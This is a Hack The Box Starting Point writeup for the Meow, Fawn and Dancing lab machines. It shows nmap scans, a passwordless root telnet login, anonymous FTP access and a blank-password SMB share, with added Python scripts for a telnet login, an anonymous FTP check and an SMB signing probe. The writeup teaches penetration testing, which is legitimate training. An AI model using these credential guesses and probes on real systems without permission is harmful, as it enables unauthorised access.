Meow, Fawn, & Dancing Writeup

Starting Point on Hack The Box (HTB) is broken down into three tiers. Tier 0 gets the user familiar with the HTB interface, with basic terminology, and with the pen testing mindset. Below is a short writeup for the first three Tier 0 boxes: Meow, Fawn, and Dancing.


Meow

Initial Recon

Ran a quick nmap scan against the box. -sC runs the default script set and -sV probes each open port for the service and version behind it.

┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ nmap -sC -sV $tgt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-15 23:25 CDT
Nmap scan report for 10.129.81.56
Host is up (0.049s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.12 seconds

Looking at the results shows a single port open – telnet on port 23. Two details in the output are worth noting: "conn-refused" in the "Not shown" line means this was an unprivileged TCP connect scan rather than a SYN scan, and without -p- nmap only checks its top 1,000 TCP ports, so "one open port" really means "one open port among the common ones".

Initial Access

Telnet

What is telnet? It is an application-layer protocol for interactive remote access to a host, the same job Secure Shell (SSH) does on port 22. The difference that matters is that telnet sends everything, including the username and password typed at login, in clear text, while SSH encrypts the session and lets the client verify the server's host key. Anyone who can capture traffic between the two hosts can read a telnet login.

Telnet can be accessed using the telnet command. The only required argument is the remote system's IP. Once connected, the remote host asks for a username. With a few guesses I find one that works and it happens to be root. Notice in the session below that no password prompt follows the username: the box lets root log in over telnet with no password at all, which is the whole weakness here. Once authenticated simply list the available files and there is flag.txt, easy enough!

┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ telnet $tgt                                                                                                 1 ⨯
Trying 10.129.81.56...
Connected to 10.129.81.56.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█


Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 16 May 2022 04:30:05 AM UTC

  System load:           0.0
  Usage of /:            41.7% of 7.75GB
  Memory usage:          4%
  Swap usage:            0%
  Processes:             138
  Users logged in:       0
  IPv4 address for eth0: 10.129.81.56
  IPv6 address for eth0: dead:beef::250:56ff:feb9:ed8e

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon May 16 04:26:31 UTC 2022 on pts/0
root@Meow:~# ls -la
total 36
drwx------  5 root root 4096 Jun 18  2021 .
drwxr-xr-x 20 root root 4096 Jul  7  2021 ..
lrwxrwxrwx  1 root root    9 Jun  4  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3132 Oct  6  2020 .bashrc
drwx------  2 root root 4096 Apr 21  2021 .cache
-rw-r--r--  1 root root   33 Jun 17  2021 flag.txt
drwxr-xr-x  3 root root 4096 Apr 21  2021 .local
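What the telnet command is doing under the hood is worth seeing once. The block below is an added example written for this writeup, not code from the page or from HTB: a minimal telnet client on a plain socket that handles the option negotiation Linux telnetd sends before the login prompt (RFC 854/855) and then sends a username. The host and username are whatever you pass in; nothing else is assumed.

```python
"""Minimal telnet client: answers option negotiation and sends a login name.

Added example for this writeup (not from the page or from HTB). It speaks the
bare telnet NVT protocol from RFC 854/855 over a plain socket, so everything
it sends, including the username, crosses the network unencrypted.
"""
from __future__ import annotations

import socket

# Telnet command bytes (RFC 854)
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240


def negotiate(data: bytes) -> tuple[bytes, bytes]:
    """Split received bytes into (application text, reply to send back).

    Every option the server proposes is refused: DO x -> WONT x, WILL x -> DONT x.
    Refusing everything is enough to get a login prompt out of Linux telnetd.
    Subnegotiation blocks (IAC SB ... IAC SE) are skipped, IAC IAC is a literal
    0xff, and a command cut off at the end of the buffer is dropped (a fuller
    client would carry it over into the next read).
    """
    text, reply = bytearray(), bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b != IAC:
            text.append(b)
            i += 1
            continue
        if i + 1 >= len(data):
            break
        cmd = data[i + 1]
        if cmd == IAC:                       # escaped 0xff data byte
            text.append(IAC)
            i += 2
        elif cmd in (DO, DONT, WILL, WONT):  # three-byte option commands
            if i + 2 >= len(data):
                break
            opt = data[i + 2]
            if cmd == DO:
                reply += bytes([IAC, WONT, opt])
            elif cmd == WILL:
                reply += bytes([IAC, DONT, opt])
            i += 3                           # DONT / WONT need no answer
        elif cmd == SB:                      # skip to the matching IAC SE
            end = data.find(bytes([IAC, SE]), i + 2)
            i = len(data) if end < 0 else end + 2
        else:                                # two-byte commands (NOP, GA, ...)
            i += 2
    return bytes(text), bytes(reply)


def telnet_login(host: str, user: str, port: int = 23, timeout: float = 5.0) -> str:
    """Connect, answer negotiation, send `user` at the login prompt, and return
    everything the server printed (banner, MOTD, shell prompt).

    A password, if the server asked for one, would be sent exactly like the
    username here: as plain bytes anyone on the path can read.
    """
    out = bytearray()
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)

        def pump() -> bool:
            try:
                chunk = s.recv(4096)
            except socket.timeout:
                return False
            if not chunk:
                return False
            text, reply = negotiate(chunk)
            out.extend(text)
            if reply:
                s.sendall(reply)
            return True

        while b"login:" not in out and pump():
            pass
        s.sendall(user.encode() + b"\r\n")   # NVT end-of-line is CR LF
        while pump():                        # read until the server goes quiet
            pass
    return out.decode(errors="replace")


if __name__ == "__main__":
    import sys
    print(telnet_login(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else "root"))
```

Run it as `python3 telnet_login.py 10.129.81.56 root` against Meow and the returned text is the same Ubuntu banner and root prompt shown above. The point of the negotiate() function is that the IAC DO/WILL bytes telnetd sends first are not part of the login dialogue; a client that does not answer them will often just hang before the "login:" prompt.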

Fawn

Initial Recon

Ran a quick nmap scan.

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Fawn]
└─$ nmap -sC -sV $tgt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-15 23:40 CDT
Nmap scan report for 10.129.1.14
Host is up (0.061s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.2
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.17 seconds

Looking at the results shows a single port open – File Transfer Protocol (FTP) on port 21, running vsftpd 3.0.3. The ftp-anon script has already confirmed that anonymous login is allowed and even listed flag.txt, and the ftp-syst status shows that both the control and data connections are plain text, so, as with telnet, anything sent over this service can be read on the wire.

Initial Access

FTP

What is FTP? It is a protocol that facilitates the transfer of files between a client and a server. It uses two TCP connections: a control connection on port 21 that carries commands and three-digit numeric replies, and a separate data connection for each directory listing or file transfer. In passive mode, which the session below uses (the 229 "Entering Extended Passive Mode" replies), the server tells the client which port to connect to for the data.

To connect to the FTP server simply use the ftp command. The only required argument is the remote system's IP. Looking at our nmap scan shows that an anonymous FTP login is allowed so I do just that.

The username is anonymous and for the password just press ENTER; a server that allows anonymous access accepts any password (by convention an email address). After listing what files are in the current directory I see flag.txt. Using the get command I can pull that file down from the FTP server to my attacking box. From there simply cat the file.

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Fawn]
└─$ ftp $tgt   
Connected to 10.129.1.14.
220 (vsFTPd 3.0.3)
Name (10.129.1.14:crimson): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||50222|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||49255|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |**********************************************************************|    32       21.64 KiB/s    00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.63 KiB/s)
ftp> exit
221 Goodbye.

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Fawn]
└─$ ll
total 4
-rw-r--r-- 1 crimson crimson 32 Jun  3  2021 flag.txt

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Fawn]
└─$ 
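The ftp session above is a sequence of commands and numeric replies, and the "229 Entering Extended Passive Mode (|||50222|)" lines are the server handing out a data port. The block below is an added example written for this writeup, not code from the page or from vsftpd: it parses single- and multi-line FTP replies, derives the data-connection endpoint from PASV and EPSV replies (the port arithmetic is the part people get wrong), and does the same anonymous login and "get" with Python's standard ftplib. The password string anonymous@example.com is an arbitrary choice; the host and filename are whatever you pass in.

```python
"""FTP control-channel helpers and an anonymous-login check (RFC 959).

Added example for this writeup, not code from the page. The parsing functions
run offline on reply strings like the ones in the session above; the check
function uses the standard library's ftplib against a live host.
"""
from __future__ import annotations

import io
import re
from ftplib import FTP, error_perm

REPLY_CLASSES = {1: "preliminary", 2: "success", 3: "needs more input",
                 4: "transient failure", 5: "permanent failure"}


def parse_reply(raw: str) -> tuple[int, str]:
    """Parse one FTP reply into (code, text).

    Single-line replies look like "220 (vsFTPd 3.0.3)". Multi-line replies
    start with "<code>-" and end at the line that starts with "<code> ", as in
    the ftp-syst STAT output nmap printed (211-...\n...\n211 End of status).
    """
    lines = raw.splitlines()
    first = lines[0]
    code = int(first[:3])
    if first[3:4] != "-":
        return code, first[4:]
    text = [first[4:]]
    for line in lines[1:]:
        if line.startswith(f"{code} "):
            text.append(line[4:])
            break
        text.append(line)
    return code, "\n".join(text)


def reply_class(code: int) -> str:
    """The first digit tells the client what to do next: 331 means 'send PASS'."""
    return REPLY_CLASSES.get(code // 100, "unknown")


def passive_endpoint(reply: str, control_host: str) -> tuple[str, int]:
    """Work out where the data connection goes from a 227 (PASV) or 229 (EPSV) reply.

    PASV packs address and port as six decimal bytes, port = p1 * 256 + p2.
    EPSV only gives the port (|||50222|); the host is the control connection's.
    """
    m = re.search(r"\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)", reply)
    if m:
        h1, h2, h3, h4, p1, p2 = map(int, m.groups())
        return f"{h1}.{h2}.{h3}.{h4}", p1 * 256 + p2
    m = re.search(r"\(\|\|\|(\d+)\|\)", reply)
    if m:
        return control_host, int(m.group(1))
    raise ValueError(f"not a PASV/EPSV reply: {reply!r}")


def anonymous_ftp_check(host: str, fetch: str | None = None, timeout: float = 5.0) -> dict:
    """Do what nmap's ftp-anon script does, then optionally download one file.

    Returns the banner, whether 'anonymous' was accepted, the root listing,
    and the bytes of `fetch` if it was requested and readable.
    """
    ftp = FTP()
    result = {"banner": ftp.connect(host, 21, timeout=timeout),
              "anonymous": False, "listing": [], "file": None}
    try:
        # By convention the anonymous password is an e-mail address; the
        # server accepts anything, which is why pressing ENTER works too.
        ftp.login("anonymous", "anonymous@example.com")
        result["anonymous"] = True
        result["listing"] = ftp.nlst()
        if fetch:
            buf = io.BytesIO()
            ftp.retrbinary(f"RETR {fetch}", buf.write)   # the ftp client's "get"
            result["file"] = buf.getvalue()
    except error_perm:          # 530 Login incorrect, 550 no such file, ...
        pass
    finally:
        try:
            ftp.quit()
        except Exception:
            ftp.close()
    return result


if __name__ == "__main__":
    import sys
    print(anonymous_ftp_check(sys.argv[1], sys.argv[2] if len(sys.argv) > 2 else None))
```

`python3 ftp_check.py 10.129.1.14 flag.txt` reproduces the whole Fawn session in one call. The EPSV port in the transcript, 50222, is the same number a PASV reply would encode as 196,46 (196 * 256 + 46), which is what passive_endpoint() computes.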

Dancing

Initial Recon

Started with a nmap scan.

┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ nmap -sC -sV $tgt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-15 23:46 CDT
Nmap scan report for 10.129.1.12
Host is up (0.053s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-05-16T08:46:44
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_clock-skew: 4h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.43 seconds

There are a few open ports – Microsoft Remote Procedure Call (RPC) on 135, the NetBIOS session service on 139 (SMB carried over NetBIOS), and Server Message Block (SMB) directly over TCP on 445. The "?" after microsoft-ds means the version probe did not get a match, which is normal for Windows SMB. The host script results are worth a look: smb2-security-mode reports that message signing is enabled but not required, the setting that makes a server a valid target for NTLM relay, and clock-skew shows the box's clock is four hours off from the attacker's.

Initial Access

SMB

What is SMB? It is a communication protocol created by Microsoft that facilitates shared access to files, printers, and named pipes between hosts. For example, a server can have a share with files that other clients in the network can access remotely. Access is granted per share based on the account that authenticates, which is why listing the shares and opening a share are two separate steps below.

To list shares on a remote system with Kali Linux, use the smbclient command. In this scenario -U is used to specify a username, -N forces no password to be used, and -L gets a list of available shares from the specified host (the backslashes before $tgt are not needed; -L $tgt does the same thing). After trying common usernames and passwords I came across valid credentials with the username admin and no password.

┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ smbclient -U 'admin' -N -L \\$tgt

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.1.12 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

The first three shares listed are the default administrative shares every Windows host exposes: ADMIN$ (the Windows directory), C$ (the whole C: drive) and IPC$ (named pipes, used for RPC). The first two need administrative rights to open. The last, WorkShares, is not a default and is where the interesting content will be. Using smbclient I can also access a share. To access a remote share I must provide valid credentials and the share name; note the doubled backslashes in the command below, since the shell consumes one of each pair.

After successfully connecting, I can use the dir command to list files. Eventually I find flag.txt. To pull that file from the SMB share to my local attacking box I use the get command. Be aware that get keeps the remote path as the local filename, so the files below land on disk literally named Amy.J\worknotes.txt and James.P\flag.txt; passing a second argument (get James.P\flag.txt flag.txt) chooses a saner local name. Once it is downloaded I can cat the file on my local system.

┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ smbclient -U 'admin' -N \\\\$tgt\\WorkShares
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Mar 29 03:22:01 2021
  ..                                  D        0  Mon Mar 29 03:22:01 2021
  Amy.J                               D        0  Mon Mar 29 04:08:24 2021
  James.P                             D        0  Thu Jun  3 03:38:03 2021

                5114111 blocks of size 4096. 1732437 blocks available
smb: \> dir Amy.J\
  .                                   D        0  Mon Mar 29 04:08:24 2021
  ..                                  D        0  Mon Mar 29 04:08:24 2021
  worknotes.txt                       A       94  Fri Mar 26 06:00:37 2021

                5114111 blocks of size 4096. 1732055 blocks available
smb: \> get Amy.J\worknotes.txt 
getting file \Amy.J\worknotes.txt of size 94 as Amy.J\worknotes.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> dir James.P\
  .                                   D        0  Thu Jun  3 03:38:03 2021
  ..                                  D        0  Thu Jun  3 03:38:03 2021
  flag.txt                            A       32  Mon Mar 29 04:26:57 2021

                5114111 blocks of size 4096. 1732026 blocks available
smb: \> get James.P\flag.txt 
getting file \James.P\flag.txt of size 32 as James.P\flag.txt (0.1 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit
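The "Message signing enabled but not required" line in the nmap output comes from a single field in the server's SMB2 NEGOTIATE response. The block below is an added example written for this writeup, not code from the page, from nmap, or from Samba: it unpacks a NetBIOS-framed SMB2 NEGOTIATE response (MS-SMB2 section 2.2.4), reads the SecurityMode bits and the dialect, decodes the FILETIME that smb2-time reports, and can send its own bare NEGOTIATE to a live host. The sample response used for offline testing is constructed here, with a random server GUID and the timestamp nmap printed for Dancing; the live probe offers dialects up to 3.0.2 only, because 3.1.1 requires negotiate contexts that are out of scope for this example.

```python
"""Read the SMB2 signing policy straight from a NEGOTIATE response.

Added example for this writeup, not code from the page or from nmap. It
reproduces what nmap's smb2-security-mode script reports by looking at the
SecurityMode field of the SMB2 NEGOTIATE response (MS-SMB2 2.2.4).
"""
from __future__ import annotations

import socket
import struct
import uuid
from datetime import datetime, timedelta, timezone

SMB2_MAGIC = b"\xfeSMB"
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
SIGNING_ENABLED, SIGNING_REQUIRED = 0x0001, 0x0002      # SecurityMode bits
DIALECTS = {0x0202: "2.0.2", 0x0210: "2.1", 0x0300: "3.0", 0x0302: "3.0.2", 0x0311: "3.1.1"}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
HDR = "<HHIHHIIQIIQ16s"         # SMB2 header after the 4-byte ProtocolId: 60 bytes
NEG_RESP = "<HHHH16sIIIIQQHHI"  # NEGOTIATE response fixed part: 64 bytes
SAMPLE_TIME = datetime(2022, 5, 16, 8, 46, 44, tzinfo=timezone.utc)  # smb2-time value above


def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME is 100 ns ticks since 1601-01-01 UTC (what smb2-time decodes)."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def datetime_to_filetime(dt: datetime) -> int:
    d = dt - FILETIME_EPOCH
    return (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10


def netbios_frame(smb: bytes) -> bytes:
    """SMB on 445 is still wrapped in a 4-byte NetBIOS session header."""
    return b"\x00" + len(smb).to_bytes(3, "big") + smb


def parse_negotiate_response(packet: bytes) -> dict:
    """Unpack a NetBIOS-framed SMB2 NEGOTIATE response and judge its signing policy."""
    body = packet[4:4 + int.from_bytes(packet[1:4], "big")]
    if packet[0] != 0 or body[:4] != SMB2_MAGIC or len(body) < 128:
        raise ValueError("not a complete NetBIOS-framed SMB2 message")
    _, _, status, command, _, flags, *_ = struct.unpack(HDR, body[4:64])
    if command != SMB2_NEGOTIATE or not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("not a NEGOTIATE response")
    (_, sec_mode, dialect, _, guid, _, _, _, _,
     sys_time, _, _, _, _) = struct.unpack(NEG_RESP, body[64:128])
    enabled, required = bool(sec_mode & SIGNING_ENABLED), bool(sec_mode & SIGNING_REQUIRED)
    verdict = ("Message signing enabled and required" if required else
               "Message signing enabled but not required" if enabled else
               "Message signing disabled")
    return {"status": status, "dialect": DIALECTS.get(dialect, hex(dialect)),
            "server_guid": str(uuid.UUID(bytes_le=guid)),
            "signing_enabled": enabled, "signing_required": required,
            "verdict": verdict, "system_time": filetime_to_datetime(sys_time)}


def build_negotiate_response(security_mode: int, dialect: int, system_time: datetime) -> bytes:
    """Constructed server reply for offline testing; no real host involved."""
    hdr = SMB2_MAGIC + struct.pack(HDR, 64, 0, 0, SMB2_NEGOTIATE, 1,
                                   SMB2_FLAGS_SERVER_TO_REDIR, 0, 0, 0, 0, 0, bytes(16))
    body = struct.pack(NEG_RESP, 65, security_mode, dialect, 0, uuid.uuid4().bytes_le,
                       0x7, 8388608, 8388608, 8388608,
                       datetime_to_filetime(system_time), 0, 128, 0, 0)
    return netbios_frame(hdr + body)


def sample_response() -> bytes:
    """What Dancing's nmap output corresponds to: 3.1.1, signing enabled, not required."""
    return build_negotiate_response(SIGNING_ENABLED, 0x0311, SAMPLE_TIME)


def probe_smb_signing(host: str, port: int = 445, timeout: float = 5.0) -> dict:
    """Send one bare SMB2 NEGOTIATE and parse the answer. Dialects 2.0.2 to 3.0.2
    are offered; 3.1.1 needs negotiate contexts, so the answer is at most 3.0.2."""
    dialects = [0x0202, 0x0210, 0x0300, 0x0302]
    hdr = SMB2_MAGIC + struct.pack(HDR, 64, 0, 0, SMB2_NEGOTIATE, 1, 0, 0, 0, 0, 0, 0, bytes(16))
    req = struct.pack("<HHHHI16sQ", 36, len(dialects), SIGNING_ENABLED, 0, 0,
                      uuid.uuid4().bytes_le, 0) + struct.pack(f"<{len(dialects)}H", *dialects)
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(netbios_frame(hdr + req))
        head = s.recv(4)
        data, need = b"", int.from_bytes(head[1:4], "big")
        while len(data) < need:
            chunk = s.recv(need - len(data))
            if not chunk:
                break
            data += chunk
    return parse_negotiate_response(head + data)


if __name__ == "__main__":
    import sys
    r = probe_smb_signing(sys.argv[1]) if len(sys.argv) > 1 else parse_negotiate_response(sample_response())
    print(f"{r['dialect']}: {r['verdict']} (server time {r['system_time'].isoformat()})")
```

With no arguments the script decodes the constructed sample and prints "3.1.1: Message signing enabled but not required (server time 2022-05-16T08:46:44+00:00)", matching the two nmap host-script lines; with a host argument it asks the box itself. Bit 0x0001 only says the server can sign; it is bit 0x0002 that forces every session to be signed, and a server without it will happily accept a session that was relayed from some other client's authentication.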